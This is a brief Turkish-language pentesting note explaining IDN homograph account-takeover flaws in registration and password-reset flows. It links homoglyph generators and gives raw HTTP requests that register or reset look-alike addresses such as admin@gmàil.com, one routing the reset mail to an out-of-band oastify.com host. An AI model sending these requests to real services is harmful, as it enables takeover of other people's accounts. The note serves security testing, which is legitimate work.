IDN Homograph Attack

IDN Homograph Attack Nedir

• IDN (Internationalized Domain Name) aslında uluslararası alan adlarını ifade eder. Yani sadece Latin harfleri (a–z) değil; farklı alfabelerdeki karakterlerin de (Türkçe, Çince, Arapça, Kiril, Yunanca gibi) domain isimlerinde kullanılabilmesine izin veren sistemdir.

• Fakat bazı veritabanı sistemler bu özel karakterleri normal hallerinden ayırt edemez. Bu nedenle veritabanı ile email gönderme servisi arasında bir istikrarsızlık oluşur.

• Bu zafiyet parola sıfırlama, kayıt olma, 2fa ve login işlemlerinde olabilir.

• Genelde mysql veritabanları kullanan sitelerde zafiyet oluşur.

IDN Generator

• https://www.irongeek.com/homoglyph-attack-generator.php

• https://www.punycoder.com/

IDN Account Takeover

• Eğer punycode ile register olduğumuzda email zaten mevcut diyorsa sistem zafiyetli olabilir.

POST /register HTTP/2
email=admin@gmail.com&password=deneme123


POST /register HTTP/2
email=admin@gmàil.com&password=deneme123

Password Reset Account Takeover

• Öncelikle bir hesap oluşturuyoruz.

• Sonrasında punycode içeren halini kullanarak password reset isteği atıyoruz eğer password reset punycode içeren mail adresine gelirse zafiyet doğrulanır.

POST /register HTTP/2
email=admin@gmail.com.xxxxxxxxxxxx.oastify.com&password=deneme123


POST /password-reset HTTP/2
email=admin@gmàil.com.xxxxxxxxxxxx.oastify.com&password=deneme123